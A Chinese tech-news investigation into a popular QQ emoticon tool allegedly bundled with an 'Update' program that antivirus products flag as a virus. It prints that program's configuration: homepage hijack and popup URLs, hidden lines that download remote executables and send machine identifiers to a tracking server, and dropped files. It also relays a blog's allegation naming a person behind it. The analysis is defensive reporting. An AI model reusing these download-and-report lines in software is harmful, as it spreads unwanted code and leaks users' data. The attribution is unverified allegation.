千万QQ表情暗藏病毒 温柔背后暗藏秘密
QQ表情本来是广受用户欢迎的一个实用工具,然而,最近有人却利用人们对QQ表情的喜爱,将其变成了一种恶性病毒。最近,笔者不断接到求助电话,受到一款名叫多多QQ表情病毒的骚扰。笔者随即对这款工具软件进行调查,发现了其背后还暗藏着惊人秘密。
真相:公开捆绑传播,被指暗藏病毒
在百度上搜索“QQ表情”,找到相关网页约1,660,000篇,搜索“多多QQ表情”,找到相关网页约660,000篇,通过这简单的计算,多多QQ表情拥有QQ表情市场近40%的市场占有率。那么这款有着惊人市场占有率的软件到底是一款什么样的软件呢?
根据其官方介绍,多多QQ表情是一款专门为腾讯QQ用户打造的免费软件,提供超炫QQ表情,点击就能导入QQ表情中,导入完毕就能在QQ聊天时使用,丰富您的对话。同时QQ表情还向软件作者和站长开出了价码,称将按0.05元一个的价格与软件捆绑,且特别声明,在安装成功后在添加删除程序中可以看到“多多QQ表情”选项,可自由卸载。
| 天极软件专题专区精选 | |||
| Windows Vista专区 | POPO专区 | QQ专区 QQ挂机 | 注册表专区 Windows优化 |
| Flash MX 视频教程 | Photoshop视频教程 | 网页设计视频教程 | 照片处理数字暗房 |
| PPT动画演示教程 | Excel动画教程集 | Word动画演示教程 | Google专区 |
| 特洛伊木马专区 | 黑客知识教程专区 | 防火墙应用专区 | 了解Web2.0 |
| Windows API开发专区 | 网络编程专区 | VB数据库编程专区 | 图像处理与多媒体编程 |
真相到底是怎样呢?在百度里,笔者发现得更多的却是和求助电话里类似的内容。见图:
同时,笔者向一位做安全的朋友求助,他称,多多QQ表情虽然只有47K,而且表面上可挟载,但它确捆绑了另一个叫Update的病毒。而这已经大大超出了之前大家所定义的流氓软件的范畴,因为,在诺顿和瑞星里,大家已经将UPDATE定义成了病毒。
诺顿对QQ表情主程序的认定:
瑞星对QQ表情的认定:
超级兔子对多多QQ表情的认定:
对UPDATE的分析
显性动作
[SetHomePage] Url=http://www.9991.com/
[PopupIE] Url=http://www.chanet.com.cn/click.cgi?a=6606&d=3086&u=
[PopupIE] Url=http://www.b2b2.net/51gg/index.html
[PopupIE] Url=http://www.7mp3.com
[PopupIE] Url=http://www.600001.com/
[PopupIE] Url=http://www.600005.com/
隐性动作
[Actions]访问 Url=http://file.qqhelper.com/up/update.dat
[Update]升级 Url=http://www.yulexingkong.com/mop/uninstalldrv.exe
[Update] Url=http://www.ha0l23.com/softbaby/uninstalltmp.exe
[Update] Url=http://tongji.qqhelper.com/tj/tj?setupid=$(setupid)&mac=$(computerid)&type=$(sendflag)&version=$(version)&exeversion=$(exeversion)&setupdate=$(setupdate)
在机器生成以下目录以及文件:
C:\Program Files\Common Files\UPDATE
update.dat
update.exe
以上动作都是update.exe干的
另外生成一个目录以及文件:
C:\Program Files\Common Files\SAND
updatesr.ini
svr.dat
qqfacerclient.exe
twunk_8.exe
还没有看到具体动作,有潜伏期。
背后:商业动机 弹出全球百强网站
多多QQ表情敢于挑战法律,公开捆绑恶性病毒,目的何在呢?笔者随后又对其展开了进一步的调查。首先,笔者打开了其弹出的第一个网站9991的链接,吃惊的发现,这家成立于2005年10月第二个星期的网站,在ALEXA里的排名居然已经上升到了全球前100名。如果按照其REACH值1万来推算,其流量已经达到了新浪的七分之一。
那么这家网站又是通过什么手段如何神奇般在3个月之内的由0做到全球100名呢?那就是前面被诺顿和瑞星认定的多多QQ表情携带的UPADATE病毒。同时,笔者打开多多QQ表情指向的其他相关网站,同样发现了这个这恶性病毒所带来的巨额流量使这些网站在短期间内搭上了超级火箭。
ALEXA发展趋势:
谁是幕后黑手?
在百度里,笔者输入“9991”显示的第一条结果是"9991实用生活网-网址大全-分类信息-实用查询",而对应的链接是www.woyaoshang.com(我要上),而不是www.9991.com,进去一看,内容和9991一样,相关的联系方式和9991也是一模一样,可以断定,他们是同一个人所为。
在DONEWS一篇BLOG暴料:“现在网站打着"9991.com是绿色安全网站,多家媒体宣传、推荐,点此查看",看来流氓改良了,不从事流氓事业了,关键是以前被你流氓的用户怎么摆脱痛苦!!!!www.woyaoshang.com又是谁注册的呢?自己没有到域名注册商那去搜索,而是直接到了www.alexa.com 去查,查询到的邮箱是whocool@163.com,,再回到baidu搜索这个信箱,原形就出来了!邮箱无一例外都指向了同一个人-——大名鼎鼎的庞升东。”
看来,表面的众多证据,都指向庞升东。但是,幕后到底又有怎样的实情?天极网将继续跟踪报道。
QQ安全相关内容:
详细讲解六大QQ病毒的特征以及清除方法
- · 3DsMAX7.5毛发效果:毛茸茸的玩具小狗
- · 用3DsMAX毛发表面锁定功能打造俏丽麻花辫
- · 3DsMAX7.5毛发新功能实例:曲线定制发型
- · 用Recomb From Splines功能制作三维发型
- · 3DsMAX毛发系统做其他表面效果:落叶小狗
- · 三维模型倒角技术要领:“三线法”的应用
- · 3DS MAX实例剖析:金色圆珠笔
- · 3DsMAX实例:窗格透光效果模拟
- · PIXAR动画工作室二十年三维动画作品回顾
- · 用3Ds MAX体积光制作光芒片头特效
- · 快速更改Word文档行距
- · 流氓软件清理助手最新1.43版
- · 千千静听另类妙用集锦
- · 被删除文件恢复全攻略
- · 中国P2P联盟规范“点对点”应用
- · 玩Windows系统工具 就是这么简单
- · 挑战文件压缩极限 榨干压缩文件
- · WinRAR也能实现智能备份
- · 用Ghost软件实现基于PXE的网络硬盘克隆
- · Switch Off让你的关机有N种玩法
- · 妙用软件参数打造软件个性功能
- · 雅虎工具条还能挡间谍软件
- · 灵活应用批量处理工具 提高工作效率
- · 使用SyGate的黑白列表限制用户权限
- · 为闪存添加自启动功能
- · 百万人公测下载工具结果出炉
- · 全面升级您的Flash播放器
- · 用XP SysPad来缝制你的软件百宝囊
- · Google的网页加速工具 你玩了吗?
- · Ghost所有运行错误代码完全大揭秘
- · 用邮箱来做自己的下载网站
- · 合理地搭配视频格式和播放器
- · 从网页缓存中挖掘音乐和Flash资源
- · PPLive 1.0.9.6 新功能与常见问题
- · QQ想做网络电视台?QQ直播再出新版
- · 百万主页跟风大潮到来了
- · 优秀的磁盘文件管家:FileAnt
- · 打造你的影像梦工厂:WinDVD Creator
